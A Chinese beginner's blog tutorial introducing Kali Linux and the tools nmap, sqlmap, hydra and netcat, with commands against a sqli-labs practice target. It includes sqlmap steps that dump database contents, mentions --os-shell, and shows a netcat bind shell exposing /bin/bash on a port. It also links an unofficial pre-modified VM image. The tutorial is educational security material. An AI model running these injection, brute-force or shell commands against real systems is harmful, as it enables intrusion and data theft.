kali linux入门及常用简单工具介绍

这篇具有很好参考价值的文章主要介绍了kali linux入门及常用简单工具介绍。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

前言

一、kali linux是什么?

二、安装下载kali

三、kali常见工具介绍

1.nmap

2.sqlmap

3.hydra

4.netcat

总结

前言

相信很多同学了解到和学习网络安全的时候都听过kali系统,大家都称之为黑客最喜爱的系统,那么什么是kali,初学者用kali能做些什么,我将在本文中做简单的介绍

一、kali linux是什么?

Kali Linux 是专门用于渗透测试Linux操作系统,它由BackTrack发展而来。在整合了IWHAX、WHOPPIX和Auditor这三种渗透测试专用Live Linux后,BackTrack正式改名为Kali LInux。没错,kali的本质也是linux系统,就好比以前的黑客经常使用一些工具,久而久之的大家就共同开源了一个集成了各种黑客工具系统。至于为什么黑客都喜欢使用kali,主要是在kali中工具齐全避免了在需要使用的时候发现工具需要再下载安装的麻烦

kali,linux,网络安全,debian

二、安装下载kali

kali的官网地址:https://www.kali.org

目前kali仍然在保持着更新,目前最新的kali系统为kali purple,里面继承了更多的防守方使用的工具。如果有访问有困难或者不知道怎么操作的同学,可以下载我的百度网盘,这里面的系统是我已经做过简单的处理(换apt源,改中文)等等。百度网盘:https://pan.baidu.com/s/18hirvdGXWqawrU2EdnJlgA?pwd=8as6

下载解压后用vm打开即可,默认root账号密码均为kali,kali。没有用过VMware的同学可以先到网上学习如何下载vm。另外新手可能会遇到虚拟机没有网络的问题,新手我这里推荐配置网卡时选择直接连接,等之后了解到网卡网段的知识可以再自己配置想要的网卡信息。(左上角虚拟机,设置,网络适配器,桥接模式,复制物理网络连接状态)

三、kali常见工具介绍

kali,linux,网络安全,debian

正如刚才所说,kali里集成了大量的黑客工具和网络安全相关工具,可以说黑客需要做的所有事情在这个系统中都有工具可以实现。下面我推荐几个新手入门可以用到的小工具。

1.nmap

nmap被称为诸神之眼,是一款非常强大的网络探测工具,可以实现主机发现和端口扫描,同时自身也可带漏洞扫描的脚本可以完成对主机端口的漏洞扫描

nmap最基础用法:

nmap [目的ip]
nmap 192.168.1.10

nmap [目的网段]
nmap 192.168.1.0/24

 kali,linux,网络安全,debian

 nmap也提供了大量的扫描时候可以设置的参数,下面将举例常用的参数:

-p                                                              扫描指定端口

-sV                                                            探测服务/版本信息

-sT                                                             使用TCP进行扫描

-sS                                                             使用TCP的SYN进行扫描

-sU                                                            UDP扫描

-A                                                              启用os检测,探测目标操作系统

-SC                                                           等效于 --script=defult使用默认脚本

kali,linux,网络安全,debian

添加参数可以显示出不同的扫描结果 

nmap更多的详细用法可以参考该链接:https://blog.csdn.net/smli_ng/article/details/105964486

2.sqlmap

sqlmap是针对sql注入漏洞的一款自动化sql注入探测工具,支持多种操作系统环境和多种数据库的漏洞探测,渗透测试人员常常调侃“没有什么操作技术,就是sqlmap一把梭哈,屏幕显示绿了就直接下班”

sqlmap的基本使用:

sqlmap -u "www.baidu.com"

 大家尽量不要在未授权的情况下去对公网资产进行批量扫描,小心去踩缝纫机哦

下面我以sqli-lab里面的靶场为例:

kali,linux,网络安全,debian

 出现图中绿色信息说明sqlmap对该参数成功注入,注意我的url中在最后以GET方式输入了参数id(/?id),如果不给sqlmap提供参数sqlmap是无法使用的哦

找到注入点后的步骤基本是确定的

 sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  --dbs  #获取当前数据库服务所开启的数据库名称
 sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  -D 数据库名 --tables  #获取某数据库下的所有表名
 sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  -D 数据库名 -T 表名 --columns #获取D数据库下T表内的所有字段
sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  -D 数据库名 -T 表名 -C 字段名 --dump  #将该字段的内容全部获取出来并存储,在最后的信息中会有存储路径信息

 第一步获取数据库:

kali,linux,网络安全,debian

 第二步获取数据库下表名:

kali,linux,网络安全,debian

 第三步获取该表字段(其实到表名这一步可以直接--dump获取表里所有内容)

kali,linux,网络安全,debian

 所以sqlmap的使用难处在于如何找到注入点,也就是找到产生sql注入的参数,在例子里参数是GET方式上传的“id”参数,下面提供一些sqlmap常用的参数

-p                                          指定测试参数

-u                                          指定目标url,如果不用-p指定参数,需要提供GET形参数,上传GET参数方法在url后加"?id=1"

-r                                           加载文件中的url请求,通常对于POST型参数的注入,文件为http报文可以通过burpsuite和wireshark抓包获得

--dbs                                     获取数据库

--level=                                 指定测试的等级(1-5 默认为1)

--risk=                                   指定测试的风险(0-3 默认为1)

--os-shell                              交互式的系统shell

详细教程可以参考:https://blog.csdn.net/smli_ng/article/details/106026901

3.hydra

hydra又称九头蛇,是一款非常高效的多种协议都可以使用的爆破工具,对指定ip的指定服务进行爆破,需要输入爆破使用的字典或者自己指定爆破使用的数据(比如在已知账号为admin时爆破密码)

在kali中hydra有图形化和命令行两种使用方式

kali,linux,网络安全,debian

 对于新手来说,图形化界面更加简易好用,下面介绍图形化使用

kali,linux,网络安全,debian

 kali,linux,网络安全,debian

 之后选择start就好了,hydra会使用字典中的所有账号密码去做登陆的爆破尝试

当然这是hydra最简单的使用方法,hydra同样也是可以通过设置参数来针对不同情况的使用,下面给出hydra的命令行详细使用链接:https://zhuanlan.zhihu.com/p/397779150

4.netcat

netcat简称nc,是一款目前最常用网络工具,它提供基于socket协议套接字针对TCP,UDP连接的网络使用,在具有nc使用权时几乎可以建立任何类型的连接,通常在渗透测试中用该工具获得目的ip的shell

nc简单使用方式:建立连接传输信息

主机1:开启对6666端口的监听

nc -lvp 6666

 参数解释:

-l                        监听

-v                        显示详细信息

-p                        指定端口

 主机2:连接主机1的6666端口

nc 192.168.0.163 6666

 kali,linux,网络安全,debian

 

nc常用使用:获取远程主机shell

​​​​​​​1.正向连接shell

主机1:

nc -lvp 6666 -e /bin/bash

 参数解释:

-e                        程序重定向

这里将主机1的/bin/bash重定向到了自己主机的6666端口

主机2:

nc 192.168.0.163 6666

 kali,linux,网络安全,debian

 

 大家可以思考一下为什么左边会有下面的报错呢?并且在执行sudo su尝试进入root权限时,必须在左侧主机输入密码才可以进入,进入后才会收到来自右侧发来的密码kali并且产生报错。可以尝试了解不同终端bash/zsh/sh的区别

总结

本文简单介绍了kali系统,只是适合对没有了解过的新手小白的一个引导,kali所包含的内容很多,如果感兴趣大家可以再寻找更多资料学习文章来源地址https://www.toymoban.com/news/detail-714603.html

到了这里,关于kali linux入门及常用简单工具介绍的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全|渗透测试入门学习,从零基础入门到精通—动态分析技术工具OllyDbg界面介绍

    目录 动态分析技术调试器 什么是OllyDbg OllyDbg能干什么 OllyDbg窗口介绍 1、反汇编面板窗口 2、信息面板窗口 3、数据面板窗口 4、寄存器面板窗口 5、栈面板窗口 动态分析技术中最重要的工具是调试器,分为用户模式和内核模式两种类型。用户模式调试器是指用来调试用户模式

    2024年02月11日
    浏览(51)
  • 网络安全kali web安全 Kali之msf简单的漏洞利用

    靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 从扫描出的端口发现,目标主机开启了135端口,服务为msrpc(远程过程调用服务),即Windows的RPC服务。 ​针对这个服务,我们就可

    2024年02月09日
    浏览(44)
  • 「Kali Linux」网络安全黑客自学、网络渗透(文末送书)

    目录 1.背景介绍 2.读者对象 3.随书资源 4.本书目录 5.本书概览 6.活动参与方式  对于企业网络安全建设工作的质量保障,业界普遍遵循PDCA(计划(Plan)、实施(Do)、检查(Check)、处理(Act))的方法论。近年来,网络安全攻防对抗演练发挥了越来越重要的作用。 企业的安

    2024年02月08日
    浏览(55)
  • 深入探索:Kali Linux 网络安全之旅

    目录 前言 访问官方网站 导航到下载页面 启动后界面操作 前言 \\\"Kali\\\" 可能指的是 Kali Linux,它是一种基于 Debian 的 Linux 发行版,专门用于渗透测试、网络安全评估、数字取证和相关的安全任务。Kali Linux 旨在提供一系列用于测试网络和系统安全性的工具,以及为安全专业人员

    2024年02月12日
    浏览(45)
  • 网络安全必备:Kali 中扫描器和爆破工具的选用与实践

    数据来源         本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。   背景         在渗透测试过程中,为了节省人力和时间,通常采用手工和工具相结合的方式。使用工具,

    2024年02月12日
    浏览(46)
  • 【文末送书】Kali Linux与网络安全

    欢迎关注博主 Mindtechnist 或加入【智能科技社区】一起学习和分享Linux、C、C++、Python、Matlab,机器人运动控制、多机器人协作,智能优化算法,滤波估计、多传感器信息融合,机器学习,人工智能等相关领域的知识和技术。关注公粽号 《机器和智能》 回复 “python项目

    2024年02月08日
    浏览(42)
  • Kali Linux:网络与安全专家的终极武器

    Kali Linux,对于许多网络和安全专业人士来说,这是一个无人不知、无人不晓的名字。它是专为网络和安全测试、渗透测试以及数字取证等任务而设计的强大操作系统。本篇文章将深入介绍Kali Linux的特点、优势以及如何使用它来进行各种安全任务。 Kali Linux 是一款基于 Debian

    2024年02月06日
    浏览(39)
  • 如何使用Kali Linux的Nmap网络安全扫描神器

    一、背景介绍 nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。 通常我们在进行网络安全测试

    2024年04月26日
    浏览(43)
  • 【网络安全零基础入门】003、2023最新kali下载安装教程(超详细,亲测可用)

    虚拟机安装(这里我使用VMware17),如果不会安装虚拟机的朋友可以看看下面这篇教程,亲测可用 【网络安全修炼-炼气期】001、Win10环境下VMware17的下载与安装(超详细,亲测可用) 我们进入kali官网,选择Installer Images 可根据自己需求选择64位,32位。 下载完成后的镜像如下图所

    2024年02月08日
    浏览(63)
  • 最新Kali Linux安装教程:从零开始打造网络安全之旅

    Kali Linux,全称为Kali Linux Distribution,是一个操作系统(2013-03-13诞生),是一款基于Debian的Linux发行版,基于包含了约600个安全工具,省去了繁琐的安装、编译、配置、更新步骤,为所有工具运行提供了一个稳定一致的操作系统基础,专注于网络安全、渗透测试和数字取证等领域

    2024年02月12日
    浏览(60)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包